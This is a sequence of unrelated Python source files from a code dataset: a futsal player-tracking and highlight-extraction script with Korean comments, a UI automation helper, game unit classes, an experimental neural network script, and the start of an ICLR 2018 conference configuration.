누적시킴 \r\n a = (int)(newbox[0]) - lastPoint.x\r\n b = (int)(newbox[1]) - lastPoint.y\r\n \r\n moving_weight=math.sqrt(math.pow(a,2) + math.pow(b,2)) # 초당 움직인 거리(즉 속도) - 유클리디안 거리측정 사용\r\n \r\n # 트레커 추적중 발생하는 진동을 최소화하기위한 코드\r\n if(moving_weight < 2) :\r\n moving_weight=0\r\n estimate_distance = estimate_distance + moving_weight # 추정거리값을 누적시킴\r\n \r\n distance = 4 * estimate_distance / 100 # 추정거리에서 도출된 값에 가중치를 두고 m단위로 변환 \r\n distance = round(distance,2) # 반올림 처리 \r\n speed = (4 * moving_weight / 100)*3.6 # moving_weight를 통해 구해진 m/s에 3.6을 곱해 속도를 k/h로 바꿔줌\r\n speed = round(speed,2)\r\n \r\n if( speed < 5 ) :\r\n walk_cnt = walk_cnt+1\r\n elif( speed < 10 ) :\r\n jog_cnt = jog_cnt+1\r\n else :\r\n sprint_cnt = sprint_cnt+1\r\n \r\n if(speed > top_speed) : # 최고속도를 top_speed에 저장\r\n top_speed = speed\r\n \r\n \r\n \r\n accumulate_speed = accumulate_speed+speed # 속도값들을 전부 누적시킴\r\n \r\n if(frame_cnt!=0):\r\n avg_speed = accumulate_speed / (frame_cnt/fps)\r\n avg_speed = round(avg_speed,1)\r\n else :\r\n avg_speed = 0\r\n \r\n \r\n lastPoint = Point(x = int(newbox[0]), y = int(newbox[1])) # 과거 좌표 갱신\r\n \r\n #txt 로그로 남겨주는 부분\r\n # f.write( 'Player '+str(i)+' x,y: '+str(int(newbox[0]))+','+str(int(newbox[1])) + '\\n' )\r\n # fTemp.write(str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n') 히트맵에 더많은 로그를 찍기위해 이동\r\n \r\n #if(frame_cnt % (fps*3)==0) :\r\n if(coord_head == coord_tail) :\r\n coord_head = Point(x = int(newbox[0]), y = int(newbox[1]))\r\n else :\r\n coord_tail = coord_head\r\n coord_head = Point(x = int(newbox[0]), y = int(newbox[1]))\r\n cv2.arrowedLine(overlay,coord_tail, coord_head, (0,0,0),2,cv2.LINE_AA)\r\n cv2.arrowedLine(overlay,coord_tail, coord_head, (0,0,0),2,cv2.LINE_AA)\r\n\r\n heatmap_background = cv2.addWeighted(overlay, alpha, heatmap_background, 1 - alpha, 0) #Heatmap_Window\r\n\r\n \r\n \r\n if((frame_cnt % (fps*10))==0) : # 프레임기반 10초(fps)마다 동작하는 코드\r\n if(frame_cnt==0) : \r\n heatmap_filename = 'heatmap_0secs.png'\r\n else :\r\n heatmap_filename = 'heatmap_'+str(frame_cnt / (fps*10)*10)+'secs.png'\r\n\r\n cv2.imwrite(heatmap_filename, heatmap_background, [cv2.IMWRITE_PNG_COMPRESSION, 0])\r\n\r\n # 10초마다 DB로 전송할 부분\r\n ##########################################################################################\r\n # heatmap_filename = 10초마다 찍은 png 파일명\r\n ##########################################################################################\r\n \r\n\r\n if((frame_cnt % (fps*interval))==0) : # 프레임기반 interval[현재는 30초(fps)]마다 동작하는 코드\r\n interval_distance = distance - temp_distance\r\n temp_distance = distance\r\n interval_distance = round(interval_distance,2)\r\n \r\n interval_acc_speed = accumulate_speed - temp_speed;\r\n temp_speed = accumulate_speed\r\n \r\n interval_avg_speed = interval_acc_speed / interval\r\n interval_avg_speed = round(interval_avg_speed,1)\r\n # 30초마다 DB로 전송할 부분\r\n ##########################################################################################\r\n # interval_distance = 30초마다 뛴 거리\r\n # interval_avg_speed = 30초마다 뛴 속도\r\n ##########################################################################################\r\n print('5분 뛴 거리 추정치 : ', interval_distance, ' / 5분 뛴 속도 추정치 : ',interval_avg_speed,' km/h')\r\n #f.write(str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n')\r\n str_coord = str_coord+str(int(newbox[1]))+','+str(int(newbox[0]))+'\\n' # str_coord 스트링에 좌표값을 누적시킴\r\n \r\n \r\n #골인 경우 2초 동안 화면에 보여주기 위함######################### \r\n \r\n if 1 <=show_goal_frame <= fps * 2 :\r\n if show_goal_frame != 1 :\r\n cv2.putText(frame, 'Home team Goal!! ',(250, 276), cv2.FONT_HERSHEY_COMPLEX, 1.5, (0,0,255), 2, cv2.LINE_AA)\r\n show_goal_frame += 1\r\n ####################################################\r\n \r\n frame_cnt=frame_cnt+1 # 프레임 갯수를 세어줌\r\n \r\n \r\n \r\n # print('거리 추정치 : ', distance, ' / 속도 추정치 : ',speed,' km/h')\r\n \r\n # 누적 거리값을 레이더의 플레이어 머리위에 띄워줌\r\n cv2.putText(radar, str(speed)+'km/h '+str(distance)+'m', (int(newbox[0]-60), int(newbox[1])-20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA) #Multitracker_Window\r\n # 레이더창에 실시간으로 선수의 볼터치 비율 보여주기 \r\n cv2.putText(radar, 'Speed : '+str(speed)+'km/h'+ ', Top speed : '+str(top_speed)+ 'km/h',(55, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Average speed : '+str(avg_speed)+'km/h'+', Running Distance : '+str(distance)+'m', (55, 60), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Walk / Jog / Sprint Count: '+str(walk_cnt)+' / '+str(jog_cnt)+' / '+str(sprint_cnt), (55, 80), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Ball Touch Count: '+str(ball_touch), (55, 100), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n cv2.putText(radar, 'Pass Count: '+str(pass_count), (55, 120), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,0,255), 1, cv2.LINE_AA)\r\n \r\n\r\n # show all windows\r\n cv2.imshow('frame', frame)\r\n # cv2.imshow('fgMask', fgMask)\r\n cv2.imshow('HeatMap',heatmap_background)\r\n cv2.imshow('Radar',radar)\r\n \r\n # quit on ESC button\r\n if cv2.waitKey(1) & 0xFF == 27: #incase Esc is pressed\r\n cv2.destroyAllWindows() # 화면 종료해주기\r\n break\r\n \r\n ################################################################영상 닫힘################################################################ \r\n \r\n \r\n avg_speed = accumulate_speed / (frame_cnt/fps)\r\n avg_speed = round(avg_speed,1)\r\n \r\n # 처음에 관리자가 A팀 선수와 B팀 몇 명씩 뛰는지 입력\r\n #player = 1, 2 \r\n #i = 0, 1\r\n\r\n #player = 3, 4\r\n # i = 2, 3 -> i = 0, 1 (flag만큼 뺴줘야 함)\r\n #flag = 2 \r\n \r\n ########################## 공 점유율 계산 알고리즘 ###############################################\r\n if player >= flag + 1 : # A팀 3명, B팀 5명으로 경기할 경우 -> flag = 3 \r\n ball_share_B.append(ball_touch) \r\n print('B팀 ', player-flag, '번째 선수 개인의 공 점유 프레임 수 : ', ball_share_B[player-flag-1]) # 0, 1...\r\n sum_ball_B += ball_share_B[player-flag-1]\r\n print('B팀 공 점유 프레임 수 누적값: ', sum_ball_B)\r\n else :\r\n ball_share_A.append(ball_touch) \r\n print('A팀 ', player, '번째 선수 개인의 공 점유 프레임 수 : ', ball_share_A[player-1])\r\n sum_ball_A += ball_share_A[i]\r\n print('A팀 공 점유 프레임 수 누적값: ', sum_ball_A)\r\n \r\n #############################################################################################\r\n\r\n print('총 뛴 거리 : ', distance,'m')\r\n print('최고 속도 : ', top_speed,'km/h')\r\n print('평균 속도 : ', avg_speed,'km/h')\r\n print('볼 터치 횟수 : ', ball_touch)\r\n print('패스 횟수 : ', pass_count,'개')\r\n #print('영상 총 프레임 수 : ', frame_cnt)\r\n\r\n \r\n move_sum = walk_cnt+jog_cnt+sprint_cnt\r\n walk_weight = round(walk_cnt / move_sum * 100,1)\r\n jog_weight = round(jog_cnt / move_sum * 100,1)\r\n sprint_weight = round(sprint_cnt / move_sum * 100,1)\r\n print('걸음 : ', walk_weight,'%, 뜀 : ', jog_weight,'%, 스프린트 : ', sprint_weight,'%')\r\n\r\n\r\n # 산소 소비량으로 측정하는 대략적인 칼로리 계산법 평균 속도 * (3.5 * 몸무게 * 시간(분) * 5 / 1000\r\n # 몸무게는 성인 남성 평균체중인 75kg로 가정\r\n cal = round(avg_speed * (3.5 * 75 *( 0.0167 * move_sum )) * 5 / 1000,1)\r\n print('소모 칼로리 : ',cal)\r\n \r\n player_file.write(str_coord)\r\n player_file.close()\r\n if(not(str_coord=='')) :\r\n heatmap.printHeatMap(height,width)\r\n \r\n\r\n # 최종 데이터를 DB로 전송할 부분\r\n ##########################################################################################\r\n # distance = 최종 뛴 거리, avg_speed = 평균속도, top_speed = 최고 속도\r\n # walk_weight = 걷기 비중, jog_weight = 조깅 비중, sprint_weight = 스프린트 비중\r\n # cal = 소모 칼로리\r\n # result_heatmap.png = 최종 히트맵 파일명\r\n ##########################################################################################\r\n \r\n \r\n \r\n ########################################공 점유율 계산 알고리즘################################################\r\n \r\n #for문이 다 돌은 뒤 공 점유율 계산\r\n ball_share_A_res = sum_ball_A / (sum_ball_A + sum_ball_B) * 100\r\n ball_share_B_res = sum_ball_B / (sum_ball_A + sum_ball_B) * 100\r\n \r\n print('\\n')\r\n print('---------------------------------------------------------------------------------------------------')\r\n print('A팀 공 점유율: ', sum_ball_A, ' % (', sum_ball_A, '+', sum_ball_B, ') x 100 = ', ball_share_A_res, '%')\r\n print('B팀 공 점유율: ', sum_ball_B, ' % (', sum_ball_A, '+', sum_ball_B, ') x 100 = ', ball_share_B_res, '%')\r\n print('---------------------------------------------------------------------------------------------------')\r\n \r\n print('DB에 분석데이터가 저장되었습니다.')\r\n \r\n \r\n \r\n ##########################################################################################################\r\n\r\n \r\n ##########################################하이라이트 추출 알고리즘#################################################\r\n \r\n \r\n print('\\n')\r\n print('하이라이트 추출 시작.....')\r\n \r\n ########################Goal.mov영상 생성#######################\r\n # 골을 인식한 프레임이 영상에서 몇 초쯤인지 계산\r\n videoFps = cap.get(cv2.CAP_PROP_FPS) # 1초에 지나가는 프레임 수(fps)\r\n point1 = int (highlight_goal_point / videoFps )\r\n \r\n # 골을 인식한 프레임 앞으로 3초, 뒤로 2초\r\n start = point1 - 3\r\n end = point1 + 2\r\n \r\n # 영상의 start부터 end까지 영역을 자름 (초 기준)\r\n ffmpeg_extract_subclip(\"TEST.mov\", start, end, targetname=\"Goal.mov\") \r\n \r\n ####################Goal_zoom.mov 영상 생성######################\r\n cap = cv2.VideoCapture('Goal.mov')\r\n\r\n #재생할 파일의 넓이와 높이\r\n width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)\r\n height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\r\n\r\n #print(\"재생할 파일 넓이, 높이 : %d, %d\"%(width, height))\r\n\r\n fourcc = cv2.VideoWriter_fourcc(*'DIVX')\r\n out1 = cv2.VideoWriter('Goal_zoom1.mov', fourcc, 30.0, (int(width), int(height)))\r\n out2 = cv2.VideoWriter('Goal_zoom2.mov', fourcc, 30.0, (int(width), int(height)))\r\n \r\n while(cap.isOpened()):\r\n ret, frame = cap.read()\r\n \r\n if ret == False:\r\n break;\r\n # out1에 해당\r\n scale =50\r\n height, width, channel = frame.shape\r\n centerX, centerY = int(height*0.5), int(width*0.75) #골인시 줌 위치 \r\n radiusX, radiusY = int(scale*height/100), int(scale*width/100)\r\n \r\n minX,maxX=centerX-radiusX,centerX+radiusX\r\n minY,maxY=centerY-radiusY,centerY+radiusY\r\n \r\n cropped = frame[minX:maxX, minY:maxY]\r\n resized_cropped = cv2.resize(cropped, (width, height)) \r\n \r\n out1.write(resized_cropped)\r\n \r\n # out2에 해당\r\n scale2 = 40\r\n height2, width2, channel2 = frame.shape\r\n centerX2, centerY2 = int(height2*0.5), int(width2*0.75) #골인시 줌 위치 \r\n radiusX2, radiusY2 = int(scale2*height2/100), int(scale2*width2/100)\r\n \r\n minX2,maxX2=centerX2-radiusX2,centerX2+radiusX2\r\n minY2,maxY2=centerY2-radiusY2,centerY2+radiusY2\r\n \r\n cropped2 = frame[minX2:maxX2, minY2:maxY2]\r\n resized_cropped2 = cv2.resize(cropped2, (width2, height2)) \r\n \r\n out2.write(resized_cropped2)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n cap.release()\r\n out1.release()\r\n out2.release()\r\n cv2.destroyAllWindows()\r\n ######################################Highlight.mov###################################\r\n \r\n # concat함수를 이용해 비디오를 합쳐주기\r\n clip1 = VideoFileClip('Goal.mov')\r\n clip2 = VideoFileClip('Goal_zoom1.mov')\r\n clip3 = VideoFileClip('Goal_zoom2.mov')\r\n \r\n final_clip = concatenate_videoclips([clip1, clip2, clip3])\r\n final_clip.write_videofile('Highlight.mov', codec='libx264') # 코텍 적어줘야\r\n\r\n \r\n print('하이라이트 영상 생성 완료.....')\r\n #test용 코드\r\n #print(highlight_goal_point, ' ', start, ' ', end) \r\n \r\n ##########################################################################################################\r\n\r\n\r\n\r\n\r\n#v2.2 5분동안 뛴 속력 측정, 걸음/조깅/스프린트 비중 측정, 칼로리 측정 기능 추가\r\n\r\n\r\n# 사각형의 중심 좌표\r\n# center_x = left+w / 2\r\n# center_y = top+h / 2\r\n# 풋살장 국제규격 길이(가로) 38m ~ 42m / 너비(세로) 20 ~ 25m 계산하기 쉽도록 가로 40m 세로 20m로 가정함 4000 2000 / 1000 571\r\n\r\n\r\n# 10초 히트맵 사진\r\n\r\n# 30초마다 뛴거리\r\n \r\n# 최종 뛴거리, 평균속도, 최고속도\r\n\r\n\r\n# 30초마다 평균속도, 최종 히트맵, 칼로리, 비율 추가해야함\r\n","sub_path":"All_Is_Well_program/test/player&soccerball/main_noDB_TEST.py","file_name":"main_noDB_TEST.py","file_ext":"py","file_size_in_byte":37743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602326995","text":"import sys\nimport Module.Algorithms\nimport Module.Utility\nimport Module.logger\nimport Module.getObject\nimport Module.CleanUp\nimport Module.Report\nimport Class.UserDefinedException\nimport Module.learningAlgo\nimport time\nimport Module.RecordTime\nimport Module.cfg\n\ndef clickOnSubmenu(driverObject,subMenuName):\n t1 = time.perf_counter()\n Excep = Class.UserDefinedException.UserDefinedException()\n success = 0\n if subMenuName == None:\n Module.logger.ERROR(\"Sub Menu name not provided\")\n\n obj = Module.getObject.getObjByRepo(driverObject,\"submenu\",subMenuName)\n if obj != None:\n try:\n obj.click()\n Module.logger.INFO(\"Sub-menu\" + subMenuName + \" is clicked\")\n success = 1\n except:\n Module.logger.ERROR(\"Sub Menu \"+subMenuName+ \"is not clickable\")\n\n\n if success == 0 and Module.cfg.learnFileSuccess == 1:\n try:\n success = Module.learningAlgo.getLearnedElements(driverObject, \"submenu\", subMenuName, \"\",position=1)\n except:\n Module.logger.WARNING(\"No Object found for submenu \" + subMenuName)\n\n\n if success == 0:\n obj = Module.getObject.getObjByAlgo(driverObject,\"submenu\",subMenuName)\n if obj != None:\n try:\n obj.click()\n Module.learningAlgo.add_obj_using_id(driverObject,\"submenu\", subMenuName, obj,position=1)\n Module.logger.INFO(\"Sub-menu\" + subMenuName + \" is clicked\")\n except:\n # Clean up before raising exception\n Module.Report.Failure(driverObject, \"SubMenu \" + subMenuName + \"is not clickable\")\n Module.CleanUp.killAllProcess()\n Excep.raiseException(\"SubMenu \" + subMenuName + \"is not clickable\")\n else:\n Module.Report.Failure(driverObject,\"SubMenu \" + subMenuName + \" not found\")\n Excep.raiseException(\"No Object found for sub menu \"+subMenuName)\n\n Module.RecordTime.calculateTime(\"clickOnSubmenu\", time.perf_counter() - t1)\n Module.RecordTime.calculateTime(\"AutomationTime\", time.perf_counter() - t1)","sub_path":"Commands/clickOnSubMenu.py","file_name":"clickOnSubMenu.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"273928031","text":"from Units.unit import Unit\n\n\nclass ThirdNotUpgraded(Unit):\n \"\"\"\n Биография:\n В мирное время, Hunters обеспечивают общество Sylvan едой, и они весьма\n уважаемы за их способности и отвагу. Странствуя по Irollan, они живут в\n гармонии с Природой и её неписанными законами. Они никогда не убьют\n живое существо просто так. Однако, в военное же время, они без\n сожаления используют свои таланты для уничтожения врагов издалека. Их\n необъяснимое сращивание в единое целое с их зачарованными Elf Bows\n позволяет им стрелять дважды, ещё до того, как соперник успеет моргнуть\n \"\"\"\n def __init__(self):\n super().__init__(\"Hunter\", # name\n 4, # attack\n 1, # protection\n 5, # min_damage\n 7, # max_damage\n 10, # health\n 10, # initiative\n 5, # speed\n None, # shots\n None, # mana\n 120, # cost\n 70, # upgrade\n 1, # length\n 1, # width\n None, # spells\n 0) # count\n\n\nclass ThirdUpgraded(Unit):\n \"\"\"\n Биография:\n Master Hunters посвящают свою жизнь обороне лесных царств и поднимаются\n как один, чтобы защитить его от посягательств любых чужаков.\n Специальное колдовство, наложенное на их стрелы и луки позволяет им\n выстрелить дважды ещё даже до того, как враг поймёт, что они здесь, а\n также гарантирует, что цель будет выздоравливать очень медленно после\n их атаки.\n \"\"\"\n def __init__(self):\n super().__init__(\"Master Hunter\", # name\n 5, # attack\n 4, # protection\n 5, # min_damage\n 9, # max_damage\n 14, # health\n 10, # initiative\n 5, # speed\n 16, # shots\n None, # mana\n 190, # cost\n None, # upgrade\n 1, # length\n 1, # width\n None, # spells\n 0) # count)\n","sub_path":"NatureProtection/ThirdCreature.py","file_name":"ThirdCreature.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"274511206","text":"import numpy as np\r\nimport multiprocessing as mp\r\nfrom NetworkGraphics import VisualizeNetwork\r\nfrom activations import *\r\n\r\nclass NetworkLayer():\r\n def __init__(self, number_of_inputs, number_of_neurons, activation_functions):\r\n self.weights = 2 * np.random.random((number_of_inputs, number_of_neurons)) - 1\r\n self.number_of_inputs = number_of_inputs\r\n self.activations = activation_functions\r\n self.number_of_neurons = number_of_neurons\r\n\r\n self.functions = {\r\n 1: sigmoid_activation,\r\n 2: tanh_activation,\r\n 3: sin_activation,\r\n 4: gauss_activation,\r\n 5: relu_activation}\r\n '''6: softplus_activation,\r\n 7: identity_activation,\r\n 8: clamped_activation,\r\n 9: inv_activation,\r\n 10: log_activation,\r\n 11: exp_activation,\r\n 12: abs_activation,\r\n 13: hat_activation,\r\n 14: square_activation,\r\n 15: cube_activation\r\n }'''\r\n\r\n self.derivatives = {\r\n 1: sigmoid_derivative,\r\n 2: tanh_derivative,\r\n 3: sin_derivative,\r\n 4: gauss_derivative,\r\n 5: relu_derivative}\r\n '''6: softplus_derivative,\r\n 7: identity_derivative,\r\n 8: clamped_derivative,\r\n 9: inv_derivative,\r\n 10: log_derivative,\r\n 11: exp_derivative,\r\n 12: abs_derivative,\r\n 13: hat_derivative,\r\n 14: square_derivative,\r\n 15: cube_derivative\r\n }'''\r\n\r\n def think(self, input):\r\n output = np.zeros(self.activations.size)\r\n self.last_inputs = input\r\n i = 0\r\n for j in np.nditer(self.activations):\r\n temp = np.dot(input, self.weights[:,i])\r\n output[i] = self.functions[self.activations[i]](temp)\r\n i += 1\r\n\r\n return output\r\n\r\n def print_debug(self):\r\n print(self.weights)\r\n print(self.activations)\r\n print(\"\")\r\n\r\nclass NeuralNetwork():\r\n def __init__(self, layers):\r\n self.d_factors = np.zeros(layers[len(layers) - 1].number_of_neurons)\r\n self.range = 0.1\r\n self.layer_dict = {}\r\n self.total_number_of_neurons = 0\r\n self.neurons_in_layers = np.zeros(len(layers))\r\n for i in range(0, len(layers)):\r\n self.layer_dict[i+1] = layers[i]\r\n self.total_number_of_neurons += layers[i].number_of_neurons\r\n self.neurons_in_layers[i] = layers[i].number_of_neurons\r\n self.activation_decisions = np.zeros(self.total_number_of_neurons)\r\n\r\n def set_d_factors(self):\r\n self.d_factors = np.zeros(self.total_number_of_neurons)\r\n\r\n def make_decision(self, input):\r\n count = 0\r\n for i in np.nditer(self.d_factors):\r\n if(input > i or np.abs(input - i) <= self.range):\r\n i = input\r\n return count\r\n else:\r\n count += 1\r\n return None\r\n\r\n #todo: offset neuronIDs by one\r\n def change_activation(self, functionID, neuronID, d_weight):\r\n d_factor = self.d_factors[neuronID]\r\n if(d_weight >= d_factor):\r\n return True\r\n elif(np.abs(d_factor - d_weight) <= self.range):\r\n return True\r\n else:\r\n return False\r\n\r\n # need highest value, pos\r\n def get_suggestion(self, output):\r\n max = np.amax(output)\r\n max_pos = np.argmax(output)\r\n\r\n return max, max_pos\r\n\r\n def run_network(self, input):\r\n output = input\r\n for i in range(0, len(self.layer_dict)):\r\n output = self.layer_dict[i+1].think(output)\r\n\r\n return output\r\n\r\n def get_activation(self, neuronID, error):\r\n input = np.append(error, neuronID)\r\n output = self.run_network(input)\r\n\r\n number_of_activations = len(self.layer_dict[1].activations)\r\n activation = int(np.interp(output,[0,1],[0,number_of_activations - 1])) + 1\r\n d_temp = np.interp(output,[0,1],[0,number_of_activations - 1]) + 1\r\n diff = np.abs(activation - d_temp)\r\n \r\n inv = 0\r\n if(diff != 0):\r\n inv = 1 / diff\r\n elif(diff <= 0.01):\r\n inv = 100 # maximum possible value given a 0.01 resolution\r\n\r\n d_weight = np.interp(inv,[2,100],[0,1])\r\n \r\n return activation, d_weight\r\n #return int(len(self.layers_dict[1].functions) * output)\r\n\r\n \r\n def train(self, training_inputs, training_outputs, network_outputs, learning_rate, iterations):\r\n for i in range(iterations):\r\n length = len(self.layer_dict)\r\n delta = []\r\n for l in range(length, 0, -1):\r\n layer = self.layer_dict[l]\r\n j = 0\r\n for n in np.nditer(layer.activations):\r\n #print(l,j)\r\n if(l != length):\r\n nextlayer = self.layer_dict[l+1]\r\n error = delta.dot(nextlayer.weights.T)\r\n delta = error * layer.derivatives[layer.activations[j]](nextlayer.last_inputs)\r\n else:\r\n error = training_outputs - network_outputs\r\n delta = error * layer.derivatives[layer.activations[j]](network_outputs)\r\n if(l == 1):\r\n #print(delta)\r\n #print(nextlayer.last_inputs)\r\n #adjustment = training_inputs.dot(delta)\r\n adjustment = learning_rate * np.outer(training_inputs, delta)\r\n #print(adjustment)\r\n elif(l == length):\r\n adjustment = learning_rate * layer.last_inputs.T.dot(delta)\r\n #print(error)\r\n #print(layer.derivatives[layer.activations[j]].__name__)\r\n #print(delta) \r\n #print(adjustment)\r\n else:\r\n adjustment = learning_rate * nextlayer.last_inputs.T.dot(delta)\r\n layer.weights += adjustment\r\n j += 1\r\n\r\n def mutate(self):\r\n length = len(self.layer_dict)\r\n for l in range(length, 0, -1):\r\n layer = self.layer_dict[l]\r\n layer.weights = self.weights = 2 * np.random.random((layer.number_of_inputs, layer.number_of_neurons)) - 1\r\n \r\n def print_debug(self):\r\n for i in range(0, len(self.layer_dict)):\r\n print(\"Layer: {}\".format(i+1))\r\n self.layer_dict[i+1].print_debug()\r\n\r\ndef start_visualization(vn, network, name):\r\n print(\"Starting: {}\".format(name))\r\n vn.start_graphics(network, name)\r\n \r\nif __name__ == \"__main__\":\r\n #np.random.seed(1)\r\n\r\n problem = np.array([3,3,4,1,4,3,5,2])\r\n target = np.array([3,4,1,5,2])\r\n guess = np.array([1,2,3,4,5])\r\n\r\n n1_number_of_inputs = problem.size\r\n \r\n n1_layer1_number_of_neurons = 5\r\n n1_layer2_number_of_neurons = target.size\r\n\r\n activations_n1_layer1 = np.ones(n1_layer1_number_of_neurons, dtype=np.int8)\r\n activations_n1_layer2 = np.ones(n1_layer2_number_of_neurons, dtype=np.int8)\r\n \r\n n1_layer1 = NetworkLayer(n1_number_of_inputs, n1_layer1_number_of_neurons, activations_n1_layer1)\r\n n1_layer2 = NetworkLayer(n1_layer1_number_of_neurons, n1_layer2_number_of_neurons, activations_n1_layer2)\r\n\r\n n1_layers = [n1_layer1, n1_layer2]\r\n n1 = NeuralNetwork(n1_layers)\r\n\r\n n2_number_of_inputs = target.size + 1\r\n\r\n n2_layer1_number_of_neurons = 5\r\n n2_layer2_number_of_neurons = 5\r\n n2_layer3_number_of_neurons = 1\r\n\r\n activations_n2_layer1 = np.ones(n2_layer1_number_of_neurons, dtype=np.int8)\r\n activations_n2_layer2 = np.ones(n2_layer2_number_of_neurons, dtype=np.int8)\r\n activations_n2_layer3 = np.ones(n2_layer3_number_of_neurons, dtype=np.int8)\r\n\r\n n2_layer1 = NetworkLayer(n2_number_of_inputs, n2_layer1_number_of_neurons, activations_n2_layer1)\r\n n2_layer2 = NetworkLayer(n2_layer1_number_of_neurons, n2_layer2_number_of_neurons, activations_n2_layer2)\r\n n2_layer3 = NetworkLayer(n2_layer2_number_of_neurons, n2_layer3_number_of_neurons, activations_n2_layer3)\r\n\r\n n2_layers = [n2_layer1, n2_layer2, n2_layer3]\r\n n2 = NeuralNetwork(n2_layers)\r\n n2.set_d_factors()\r\n\r\n debug = False\r\n\r\n # =========== Start Visualizing Network ===========\r\n vn1 = VisualizeNetwork()\r\n vn2 = VisualizeNetwork()\r\n\r\n process1 = mp.Process(target=start_visualization, args=(vn1, n1, \"N1\"))\r\n process2 = mp.Process(target=start_visualization, args=(vn2, n2, \"N2\"))\r\n\r\n process1.start()\r\n process2.start()\r\n # ========= End Visualizing Network ==========\r\n\r\n print(\"Starting training\")\r\n\r\n if(debug):\r\n n1.print_debug()\r\n print(\"\")\r\n n2.print_debug()\r\n\r\n last_guess = guess\r\n counter = 0\r\n while(np.array_equal(target, guess) != True):\r\n n0 = target - guess\r\n\r\n #n1.print_debug()\r\n # update activation functions\r\n for i in range(0, n1.total_number_of_neurons):\r\n output_n2, d_weight = n2.get_activation(i, n0)\r\n n1.activation_decisions[i] = d_weight\r\n #print(output_n2)\r\n if(n2.change_activation(output_n2, i, d_weight)):\r\n count = 0\r\n id = i\r\n for l in np.nditer(n1.neurons_in_layers):\r\n if(l > id):\r\n n1.layer_dict[int(count + 1)].activations[int(id)] = output_n2\r\n n2.d_factors[int(i)] = d_weight\r\n break\r\n else:\r\n id -= l\r\n count += 1\r\n #n1.print_debug()\r\n\r\n output_n1 = n1.run_network(problem)\r\n d_weight, d_pos = n1.get_suggestion(output_n1)\r\n\r\n pos = n1.make_decision(d_weight)\r\n print(guess,\"\\n\")\r\n last_guess = guess\r\n '''if(pos != None):\r\n guess[d_pos], guess[pos] = guess[pos], guess[d_pos]'''\r\n for i in range(0, len(guess)):\r\n if(guess[i] == d_pos + 1):\r\n if(pos != None):\r\n guess[pos], guess[i] = guess[i], guess[pos]\r\n\r\n print(guess,\"\\n\")\r\n\r\n '''for i in range(0, n1.total_number_of_neurons):\r\n input_n2_temp = np.append(n0, i)\r\n #n2.train(target, input_n2_temp, n1.activation_decisions[i], 1)\r\n #n2.train(input_n2_temp, target, guess, n0, n1.activation_decisions[i], 1, True)'''\r\n\r\n #n1.train(target, problem, guess, 1)\r\n #n1.train(problem, target, guess, n0, guess, 1, False)\r\n n1.train(problem, target, guess, 0.1, 1)\r\n n2.mutate()\r\n\r\n if(np.array_equal(last_guess, guess)):\r\n counter += 1\r\n if(counter > 9):\r\n counter = 0\r\n n1.mutate()\r\n print(\"mutated\")\r\n \r\n #input(\"Press Enter...\")\r\n \r\n \r\n","sub_path":"NeuralNetworkFirstTest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431414215","text":"#!/usr/bin/python\n\nimport sys, os, copy\n\n\"\"\"\nGROUPS\n\nDefines constants for CONF (the name of the conference), and for the names of each group.\nAll other groups will be named by joining the name with CONF: /\n\nExample:\n\n CONF = 'my.conference/2017'\n PROGRAM_CHAIRS = 'Program_Chairs'\n\n --> my.conference/2017/Program_Chairs\n\n\"\"\"\n\nCONF = \"ICLR.cc/2018/Conference\"\nADMIN = CONF + '/Admin'\nPROGRAM_CHAIRS = CONF + '/Program_Chairs'\n\nAUTHORS = CONF + '/Authors'\n\nAREA_CHAIRS = CONF + '/Area_Chairs'\nAREA_CHAIRS_INVITED = AREA_CHAIRS + '/Invited'\nAREA_CHAIRS_DECLINED = AREA_CHAIRS + '/Declined'\nAREA_CHAIRS_EMAILED = AREA_CHAIRS + '/Emailed'\n\nREVIEWERS = CONF + '/Reviewers'\nREVIEWERS_INVITED = REVIEWERS + '/Invited'\nREVIEWERS_DECLINED = REVIEWERS + '/Declined'\nREVIEWERS_EMAILED = REVIEWERS + '/Emailed'\n\nAUTHORS_PLUS = AUTHORS + '_and_Higher'\nREVIEWERS_PLUS = REVIEWERS + '_and_Higher'\nAREA_CHAIRS_PLUS = AREA_CHAIRS + '_and_Higher'\n\nDUE_TIMESTAMP = 1509138000000 # 17:00:00 EST on October 27, 2017\nWEBPATH = os.path.join(os.path.dirname(__file__), '../webfield/conferenceWebfield_tabs.js')\n\n\"\"\"\nINVITATIONS\n\nDefines constants for various invitations.\nThe full name of an invitation will be generated by joining the name with CONF by \"/-/\": /-/\n\nExample:\n\n CONF = 'my.conference/2017'\n SUBMISSION = 'Submission'\n\n --> my.conference/2017/-/Submission\n\nPARAMETERS\n\nDictionaries that represent argument combinations defining Group and Invitation permissions.\n\nExample:\n\n restricted = {\n 'readers': [CONF],\n 'writers': [CONF],\n 'signatories': [CONF],\n }\n\n The \"restricted\" configuration above will only allow the CONF group to read, write, and sign\n for the newly created Group that uses it.\n\"\"\"\n\ngroup_params = {\n 'readers': [CONF, PROGRAM_CHAIRS],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': [CONF]\n}\n\npublic_group_params = {\n 'readers': ['everyone'],\n 'writers': [CONF],\n 'signatories': [CONF],\n 'signatures': 